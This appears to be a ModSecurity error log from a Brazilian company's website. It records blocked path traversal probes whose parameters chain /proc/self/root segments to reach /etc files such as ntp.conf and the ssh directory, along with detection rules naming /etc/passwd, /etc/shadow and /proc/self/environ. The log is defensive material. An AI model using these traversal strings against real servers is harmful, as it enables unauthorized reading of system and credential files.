[Tue Mar 17 11:12:06.474688 2026] [:error] [pid 1016:tid 140411725141760] [client 74.7.243.203:39062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhNpqmL8PQht4WJFlRRAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:09.003002 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.243.203:39072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhOa4xEDsg_V3ESNY9uAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:11.543435 2026] [:error] [pid 1016:tid 140411725141760] [client 74.7.243.203:36088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhO5qmL8PQht4WJFlRSAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:15.707682 2026] [:error] [pid 18709:tid 140411658000128] [client 74.7.243.203:36104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhPzarLhPAjZGI1b24sQAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:16.706327 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.46:33980] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhQNY0UrI5A3LftIzsDAAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:12:17.299164 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.243.203:36112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhQe82sZHvlq4xgHrN_wAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:18.795538 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.243.203:36124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhQgeiSKl8TjouI-YK9wAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:21.323156 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.243.203:36126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhRb-sgTmmJoPuMdypTwAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:23.181043 2026] [:error] [pid 19675:tid 140411624429312] [client 74.7.243.203:38262] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhRyRqLn8Q9FeNKd-_xQAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:42.680574 2026] [:error] [pid 9155:tid 140411683178240] [client 74.7.243.203:60966] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhWtbI7zhHXcabyMUwRQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:12:52.418159 2026] [:error] [pid 8856:tid 140411691570944] [client 74.7.243.203:36226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhZHUHeC6oxrTQ0VC4LwAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:13:02.499660 2026] [:error] [pid 19125:tid 140411548894976] [client 74.7.243.203:36252] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhbs5urE8i_Bs7KBR24QAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:13:06.065009 2026] [:error] [pid 19756:tid 140411741927168] [client 74.7.243.203:55920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhcoZy4YGzbZQWu-w98AAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:13:09.496199 2026] [:error] [pid 8856:tid 140411699963648] [client 74.7.243.203:55936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhdXUHeC6oxrTQ0VC4MwAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:13:14.941405 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:57148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablheq4xEDsg_V3ESNY9xwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:13:18.821663 2026] [:error] [pid 1016:tid 140411716749056] [client 74.7.243.203:57150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhfpqmL8PQht4WJFlRVAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:13:21.467169 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.243.203:36084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhgQeiSKl8TjouI-YLAQAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:13:23.823439 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.243.203:36096] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablhg-82sZHvlq4xgHrOGAAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:14:43.440393 2026] [:error] [pid 18709:tid 140411683178240] [client 74.7.241.46:33668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablh0zarLhPAjZGI1b25FgAAA4c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:15:09.676277 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.244.31:45506] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablh7aBJNF7axNlVR0UG2wAAAAs"]
[Tue Mar 17 11:15:43.539387 2026] [:error] [pid 18709:tid 140411565680384] [client 74.7.241.46:57176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abliDzarLhPAjZGI1b25NwAAA5U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:16:06.206341 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.46:37704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abliJNCmCSWTlPouqorW7wAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
